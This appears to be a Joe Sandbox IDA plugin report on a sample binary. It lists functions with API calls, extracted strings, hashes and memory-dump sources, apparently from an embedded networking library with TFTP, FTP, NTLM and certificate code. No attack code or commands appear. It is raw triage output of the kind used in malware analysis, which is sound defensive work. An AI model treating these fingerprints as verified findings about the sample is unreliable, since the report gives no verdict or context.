Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: sendto$ErrorLast
String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
API String ID: 4042023021-2715966420
Opcode ID: 4cecff9b31bd1b91d25c690aacf9f9b4849c2dbfbbb99b950167781e55e70fb0
Instruction ID: 2cb6d34f44f9f834642a78518f98651e846fd8087d43768285feb3e2e439a879
Opcode Fuzzy Hash: 4cecff9b31bd1b91d25c690aacf9f9b4849c2dbfbbb99b950167781e55e70fb0
Instruction Fuzzy Hash: 3BA1C4B3B0868186E765AF25D4807E9B7A0FB48F88F444035DE5D8B798DF78D544C7A0

Function 00007FF7F1320180 Relevance: 16.7, APIs: 11, Instructions: 163synchronizationCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13201BE
WaitForSingleObject.KERNEL32 ref: 00007FF7F13202E6
GetExitCodeProcess.KERNEL32 ref: 00007FF7F13202F4
CloseHandle.KERNEL32 ref: 00007FF7F132030A
CloseHandle.KERNEL32 ref: 00007FF7F1320318
GetLastError.KERNEL32 ref: 00007FF7F1320326
CloseHandle.KERNEL32 ref: 00007FF7F132033B
CloseHandle.KERNEL32 ref: 00007FF7F132034D
CloseHandle.KERNEL32 ref: 00007FF7F1320366
CloseHandle.KERNEL32 ref: 00007FF7F1320374
CloseHandle.KERNEL32 ref: 00007FF7F132038A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait_invalid_parameter_noinfo
String ID:
API String ID: 2936579111-0
Opcode ID: 16d080daddb4de49fdbf25b5749fe77e2b5603bb03e0ba422942d5b6370a4db6
Instruction ID: 1b50b7c2888c84c2d56d0f7c9cd982912173982a50e89132caa59f6f57e61595
Opcode Fuzzy Hash: 16d080daddb4de49fdbf25b5749fe77e2b5603bb03e0ba422942d5b6370a4db6
Instruction Fuzzy Hash: 65617D21B09B4187FB10BB61D4401BDA3A1AF45BA4F850579DE2E17BD9CFBDE44583E0

Function 00007FF7F12D2CDC Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

%lld, xrefs: 00007FF7F12D2E3B
tsize, xrefs: 00007FF7F12D2EB7
TFTP filename too long, xrefs: 00007FF7F12D2D9F
TFTP buffer too small for options, xrefs: 00007FF7F12D2EA4, 00007FF7F12D310B
%s%c%s%c, xrefs: 00007FF7F12D2DCA
timeout, xrefs: 00007FF7F12D306E
blksize, xrefs: 00007FF7F12D2F94

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: %lld$%s%c%s%c$TFTP buffer too small for options$TFTP filename too long$blksize$timeout$tsize
API String ID: 0-1082497253
Opcode ID: 2dd4c3d86f24cc8d94e20a1282731ef7ff7c5b550ef04e245770f3f6e0de58e0
Instruction ID: 51599747f50c9a9e85e90f4596c165fea646a966d1c69597b387654f702c19c9
Opcode Fuzzy Hash: 2dd4c3d86f24cc8d94e20a1282731ef7ff7c5b550ef04e245770f3f6e0de58e0
Instruction Fuzzy Hash: A8E18FA2B08AC286EB10DF54D4403B9F7A1EB85B88F898136CA6D877D5DFBCD545C360

Function 00007FF7F12DB530 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 161networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF7F12DB71C

Strings

STOP, xrefs: 00007FF7F12DB772
FTP response aborted due to select/poll error: %d, xrefs: 00007FF7F12DB722
We got a 421 - timeout, xrefs: 00007FF7F12DB73B
[%s] -> [%s], xrefs: 00007FF7F12DB77C
getFTPResponse -> result=%d, nread=%zd, ftpcode=%d, xrefs: 00007FF7F12DB6E9
FTP response timeout, xrefs: 00007FF7F12DB799
getFTPResponse start, xrefs: 00007FF7F12DB54C
???, xrefs: 00007FF7F12DB76B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: ???$FTP response aborted due to select/poll error: %d$FTP response timeout$STOP$We got a 421 - timeout$[%s] -> [%s]$getFTPResponse -> result=%d, nread=%zd, ftpcode=%d$getFTPResponse start
API String ID: 1452528299-2707140833
Opcode ID: 9365f5d093863395c4febbb40364748f3b4be129e8fac596ae922e07d2770973
Instruction ID: dfa623762d5c99007fddcb4eebfaaf6cfc5489228507b8d2f7358ce115dfe5dd
Opcode Fuzzy Hash: 9365f5d093863395c4febbb40364748f3b4be129e8fac596ae922e07d2770973
Instruction Fuzzy Hash: A8619022B0878286EB54BB96D8102B9A790AF867A4FC44135DD7D873D5EFBCE44583A0

Function 00007FF7F12B3C80 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 124libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000002,00007FF7F12ED8CB,?,?,?,?,?,?,00007FF7F12B3E8B), ref: 00007FF7F12B3C94
GetProcAddress.KERNEL32(?,?,00000002,00007FF7F12ED8CB,?,?,?,?,?,?,00007FF7F12B3E8B), ref: 00007FF7F12B3CB9

Strings

AddDllDirectory, xrefs: 00007FF7F12B3D10
kernel32, xrefs: 00007FF7F12B3C8D
LoadLibraryExA, xrefs: 00007FF7F12B3CAA

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: AddDllDirectory$LoadLibraryExA$kernel32
API String ID: 1646373207-3327535076
Opcode ID: 023bb16efbd3f086ade453e5794a8645d8237b78f16ca98ff3619fe335ae2783
Instruction ID: e3698a8c9312d3cbb69ba2a69fc2131e2dfc8bf88dbeef4f35f4c7185e9d89cf
Opcode Fuzzy Hash: 023bb16efbd3f086ade453e5794a8645d8237b78f16ca98ff3619fe335ae2783
Instruction Fuzzy Hash: 7441D612B09A4682FB55EF5AA540135AB91AF8AFD4F8C8134CE2D433D4DFBCE485C364

Function 00007FF7F12F3AE2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 142COMMON

Download Yara Rule

APIs

_vfwprintf_l.LIBCMT ref: 00007FF7F12F3DB7
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3DDC

Strings

GMT, xrefs: 00007FF7F12F3B3A
Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F3DD0
Signature, xrefs: 00007FF7F12F3D53, 00007FF7F12F3D7A
%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s, xrefs: 00007FF7F12F3B72
%s: %s, xrefs: 00007FF7F12F3D81

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=_vfwprintf_l
String ID: %s: %s$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$GMT$Signature
API String ID: 2063679162-2552702830
Opcode ID: af0a308eb33c86821f81bb7ed10213ac9d13e3ab6c0b510df5bb56387812e107
Instruction ID: 9d8db8309bcc7323427558ca2d2e362045b1cc2b239a2bc0dc516562354031b1
Opcode Fuzzy Hash: af0a308eb33c86821f81bb7ed10213ac9d13e3ab6c0b510df5bb56387812e107
Instruction Fuzzy Hash: 31518362B0C68782EB10AFA5D4901B9E7A1FF44794FC40032DA6D8B6C9DFBCE505C3A4

Function 00007FF7F12F3994 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 126COMMON

Download Yara Rule

APIs

_vfwprintf_l.LIBCMT ref: 00007FF7F12F3DB7
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3DDC
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3E53

Strings

Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
%s%x, xrefs: 00007FF7F12F3A0D
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F3DD0
Signature, xrefs: 00007FF7F12F3D53, 00007FF7F12F3D7A
%02x:, xrefs: 00007FF7F12F39BE
%s: %s, xrefs: 00007FF7F12F3D81

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=$_vfwprintf_l
String ID: %s: %s$%02x:$%s%x$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
API String ID: 1392487457-4134566305
Opcode ID: 82c9a304a55d7ea7e905cff5378cf69a3c52388fc5dcd46fc02fd83b2b9662a5
Instruction ID: 0ece28826f370dc5b8974a45120b9a6eb014e41d8434c632906d0c0086a2101b
Opcode Fuzzy Hash: 82c9a304a55d7ea7e905cff5378cf69a3c52388fc5dcd46fc02fd83b2b9662a5
Instruction Fuzzy Hash: 35516421B0C68796EB10ABA5D4902BDA751FF44794FC40032DA7DDB6C9EFACE505C3A0

Function 00007FF7F12F395D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 102COMMON

Download Yara Rule

APIs

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3988
_vfwprintf_l.LIBCMT ref: 00007FF7F12F3DB7
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3DDC

Strings

Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F3DD0
TRUE, xrefs: 00007FF7F12F3975
Signature, xrefs: 00007FF7F12F3D53, 00007FF7F12F3D7A
%s: %s, xrefs: 00007FF7F12F3D81

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=$_vfwprintf_l
String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature$TRUE
API String ID: 1392487457-2967394984
Opcode ID: d40dc6caf98b1959f239ecbeebf660d59fe11d6a7f388a3240a9f58c4a69ed16
Instruction ID: 7233455b19662ac539af234ec2ebdeec03f3dbb19320322fa92ca3a5762b25dd
Opcode Fuzzy Hash: d40dc6caf98b1959f239ecbeebf660d59fe11d6a7f388a3240a9f58c4a69ed16
Instruction Fuzzy Hash: D6413522B0868796EB10ABA5D4941BAA761FF44794FC00031D92D9B6D9DFBCE545C3A0

Function 00007FF7F12FFEB4 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7F12FFF11

Part of subcall function 00007FF7F1302274: __GetUnwindTryBlock.LIBCMT ref: 00007FF7F13022B7
Part of subcall function 00007FF7F1302274: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7F13022DC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7F12FFFE9
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7F1300237
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F1300344

Strings

csm, xrefs: 00007FF7F12FFF92
csm, xrefs: 00007FF7F130000C
csm, xrefs: 00007FF7F12FFF2B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 40e7a1d984637f1b15e62fc4eb181154e2c5237c6989c010dd7a3fa2b4aa81b6
Instruction ID: ab619e85c0dc855d005c1d0f01377f4f6386fc161b9066f3c5cd7f946c20406d
Opcode Fuzzy Hash: 40e7a1d984637f1b15e62fc4eb181154e2c5237c6989c010dd7a3fa2b4aa81b6
Instruction Fuzzy Hash: C0D19132A0878187EB24EB6594403ADB7A0FF45788F900139EEAD57BDACF79E141C790

Function 00007FF7F12FD924 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 239COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF7F12FD9D1
MultiByteToWideChar.KERNEL32 ref: 00007FF7F12FDA6D
MultiByteToWideChar.KERNEL32 ref: 00007FF7F12FDB16
MultiByteToWideChar.KERNEL32 ref: 00007FF7F12FDB40
MultiByteToWideChar.KERNEL32 ref: 00007FF7F12FDBE8
CompareStringEx.KERNEL32 ref: 00007FF7F12FDC35

Strings

M&S works hard to make better products and shops. They want to sell even more in the next years., xrefs: 00007FF7F12FD929

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID: M&S works hard to make better products and shops. They want to sell even more in the next years.
API String ID: 2984826149-2797344925
Opcode ID: 07441517bed317fe36ebe1df40869ff7a7dcdc8802cd1942ef5b058da9a8c6cd
Instruction ID: 8dbd9cad42af10ee3d6c90ac14a81b82d866058408ce90f86eb463a2b370ef3e
Opcode Fuzzy Hash: 07441517bed317fe36ebe1df40869ff7a7dcdc8802cd1942ef5b058da9a8c6cd
Instruction Fuzzy Hash: 32A1C562B0C68A46EB21AFA08454379A791EF40BA8FC44635DA7D877C4DFBCE44493E0

Function 00007FF7F12C0730 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 142COMMON

Download Yara Rule

APIs

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12C086A
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12C0927

Strings

ftp, xrefs: 00007FF7F12C088B
;type=%c, xrefs: 00007FF7F12C08EC
?%s, xrefs: 00007FF7F12C093A
http, xrefs: 00007FF7F12C07E9
;type=, xrefs: 00007FF7F12C08AB

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=
String ID: ;type=$;type=%c$?%s$ftp$http
API String ID: 356670603-3547414
Opcode ID: abe16133e0f2bab088ce8032117a6559f298c416f493daf04005beefbf736e50
Instruction ID: a0cee246bc510e4358909bed810e1e8ea50cc81b975294824a7ac3aaac4e9065
Opcode Fuzzy Hash: abe16133e0f2bab088ce8032117a6559f298c416f493daf04005beefbf736e50
Instruction Fuzzy Hash: CC51D125B0868341FB14B7A6A4503FA9690AF45B90F884035DF6DC77D2EFAEE801C3A4

Function 00007FF7F12F3A2C Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 106COMMON

Download Yara Rule

APIs

_vfwprintf_l.LIBCMT ref: 00007FF7F12F3DB7
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3DDC
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3E53

Strings

Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F3DD0
Signature, xrefs: 00007FF7F12F3D53, 00007FF7F12F3D7A
%02x:, xrefs: 00007FF7F12F3A50
%s: %s, xrefs: 00007FF7F12F3D81

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=$_vfwprintf_l
String ID: %s: %s$%02x:$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
API String ID: 1392487457-2144801519
Opcode ID: b6e9fbae42d31899ea9514cf5f310ddaad571242618a51ac496a56b80f278b1f
Instruction ID: e9603261827fb4e4f272cb0b5182576a72d7eb76e4212794e1565b4482dcd289
Opcode Fuzzy Hash: b6e9fbae42d31899ea9514cf5f310ddaad571242618a51ac496a56b80f278b1f
Instruction Fuzzy Hash: 6A415421B0C64792FB10ABA5D4941BEE751FF44794FC00031DA2D9B6D9EFACE545C3A0

Function 00007FF7F12F3A6F Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

_vfwprintf_l.LIBCMT ref: 00007FF7F12F3DB7
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3DDC

Strings

Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F3DD0
Signature, xrefs: 00007FF7F12F3D53, 00007FF7F12F3D7A
%02x:, xrefs: 00007FF7F12F3A8D
%s: %s, xrefs: 00007FF7F12F3D81

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=_vfwprintf_l
String ID: %s: %s$%02x:$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
API String ID: 2063679162-2144801519
Opcode ID: cd5bc3cb97de8a2aaf571fcf7292bf6f5bee2736c1531b2368bc66c047e5b848
Instruction ID: 4445a11a80d12fecc43363e6706732cfbbb89fda5058c6bd3f7bf3a3a35f4c68
Opcode Fuzzy Hash: cd5bc3cb97de8a2aaf571fcf7292bf6f5bee2736c1531b2368bc66c047e5b848
Instruction Fuzzy Hash: A0414521B0C68792EB10ABA5D4941BAE751FF44794FC00031DA2D9B6D9EFACE545C3A0

Function 00007FF7F1304B44 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1304B87
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1304F74
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1305210

Strings

p, xrefs: 00007FF7F1304CB1
p, xrefs: 00007FF7F1304C39
f, xrefs: 00007FF7F1304CA9

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: d422bfe28a17b75aa9da2920a17567928dc802ef632086f76624d76a6e029c17
Instruction ID: 6a5481fded68797ddc89f70fdbf1b54d4571294f376a366938b54c254c5b3ff7
Opcode Fuzzy Hash: d422bfe28a17b75aa9da2920a17567928dc802ef632086f76624d76a6e029c17
Instruction Fuzzy Hash: D612C421A0C24387FB24BA14D15467AF3D1FF90758FD9403DE6AA47AC4DBBDE5808BA0

Function 00007FF7F12CBC20 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 186COMMON

Download Yara Rule

APIs

_vfwprintf_l.LIBCMT ref: 00007FF7F12CBE0C
_vfwprintf_l.LIBCMT ref: 00007FF7F12CBEF1

Strings

HTTP, xrefs: 00007FF7F12CBC3B
Proxy-, xrefs: 00007FF7F12CBE2C, 00007FF7F12CBF0D
%sAuthorization: NTLM %s, xrefs: 00007FF7F12CBE36, 00007FF7F12CBF17
NTLM, xrefs: 00007FF7F12CBC25

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _vfwprintf_l
String ID: %sAuthorization: NTLM %s$HTTP$NTLM$Proxy-
API String ID: 1692953108-3948863929
Opcode ID: 25e80bbd132b583b1b48b4671cc279ba6715ef5a3f42b0496f6bfab709eb7789
Instruction ID: fc0635f14da13b9f21a7d1d8c440ed5089bd17cadaa916a7ac363de8428c7a77
Opcode Fuzzy Hash: 25e80bbd132b583b1b48b4671cc279ba6715ef5a3f42b0496f6bfab709eb7789
Instruction Fuzzy Hash: 01816432708B8682EB20EB55E4547AEB7A0FB85794F800036EB9D87795DF7DD504CB90

Function 00007FF7F12F3BFE Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

APIs

_vfwprintf_l.LIBCMT ref: 00007FF7F12F3DB7
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F3DDC

Strings

Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F3DD0
Signature, xrefs: 00007FF7F12F3D53, 00007FF7F12F3D7A
%s: %s, xrefs: 00007FF7F12F3D81

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=_vfwprintf_l
String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
API String ID: 2063679162-995577734
Opcode ID: 80b32c139fe1997281bc2532d75e550a081ac61f7f90c25277eca46600cb2585
Instruction ID: 6e43b6d2b4dfc2e44372ad89ccc4437d6cc76d7f342b84d03e556e15ae2f12ab
Opcode Fuzzy Hash: 80b32c139fe1997281bc2532d75e550a081ac61f7f90c25277eca46600cb2585
Instruction Fuzzy Hash: 6351D521B0869342FB24BAA5D4942F9A791EF54794F800036DA7ECB5CADFACE545C3A0

